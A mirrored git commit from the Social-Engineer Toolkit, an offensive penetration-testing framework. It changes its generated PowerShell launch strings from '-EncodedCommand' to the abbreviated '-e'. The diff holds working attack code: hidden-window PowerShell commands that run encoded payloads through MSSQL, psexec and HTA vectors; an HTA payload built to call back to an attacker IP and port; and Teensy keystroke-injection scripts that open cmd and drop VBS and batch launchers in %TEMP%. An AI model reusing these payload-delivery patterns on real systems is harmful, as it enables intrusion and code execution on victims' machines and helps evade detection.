Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-11-23 04:53:05 +00:00
Code Issues Projects Releases Packages Wiki Activity

convert encodedcommand to -e abbreviated

Browse source
This commit is contained in:
TrustedSec 2016-10-13 23:13:53 -04:00
parent c27dee6ea0
commit 0ff64fcae0
7 changed files with 12 additions and 6 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
readme/CHANGELOG
View file

@ -1,3 +1,9 @@
~~~~~~~~~~~~~~~~
version 7.4.1
~~~~~~~~~~~~~~~~
* converted all powershell encodedcommand to abbreviated
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
version 7.4 version 7.4
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~

2
src/fasttrack/mssql.py
View file

@ -262,7 +262,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
x86 = file(core.setdir + "x86.powershell").read().rstrip() x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read() # x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
core.print_status("If you want the powershell commands and attack, " core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")

2
src/fasttrack/psexec.py
View file

@ -86,7 +86,7 @@ try:
#with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: #with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
# x86 = fileopen.read() # x86 = fileopen.read()
x86 = open(core.setdir + "x86.powershell", "r").read() x86 = open(core.setdir + "x86.powershell", "r").read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)

2
src/powershell/powershell.py
View file

@ -57,7 +57,7 @@ if powershell_menu_choice != "99":
# here we format everything for us # here we format everything for us
with open(core.setdir + "/x86.powershell") as fileopen: with open(core.setdir + "/x86.powershell") as fileopen:
x86 = fileopen.read() x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86 x86 = "powershell -nop -window hidden -noni -e " + x86
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite: with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
filewrite.write(x86) filewrite.write(x86)

2
src/teensy/binary2teensy.py
View file

@ -373,7 +373,7 @@ void loop()
// run through cmd // run through cmd
CommandAtRunBar("cmd"); CommandAtRunBar("cmd");
delay(1000); delay(1000);
Keyboard.println("powershell -EncodedCommand {powershell_command}"); Keyboard.println("powershell -e {powershell_command}");
delay(4000); delay(4000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}"); Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}"); Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");

2
src/teensy/sd2teensy.py
View file

@ -174,7 +174,7 @@ void setup()
// run through cmd // run through cmd
CommandAtRunBar("cmd"); CommandAtRunBar("cmd");
delay(1000); delay(1000);
Keyboard.println("powershell -EncodedCommand {powershell_command}"); Keyboard.println("powershell -e {powershell_command}");
// Tweak this delay. Larger files take longer to decode through powershell. // Tweak this delay. Larger files take longer to decode through powershell.
delay(10000); delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}"); Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");

2
src/webattack/hta/main.py
View file

@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
"Generating powershell injection code and x86 downgrade attack...") "Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload( ps = generate_powershell_alphanumeric_payload(
selection, ipaddr, port, "x86") selection, ipaddr, port, "x86")
command = ("powershell -window hidden -EncodedCommand " + ps) command = ("powershell -window hidden -e " + ps)
# hta code here # hta code here
print_status("Embedding HTA attack vector and PowerShell injection...") print_status("Embedding HTA attack vector and PowerShell injection...")
# grab cloned website # grab cloned website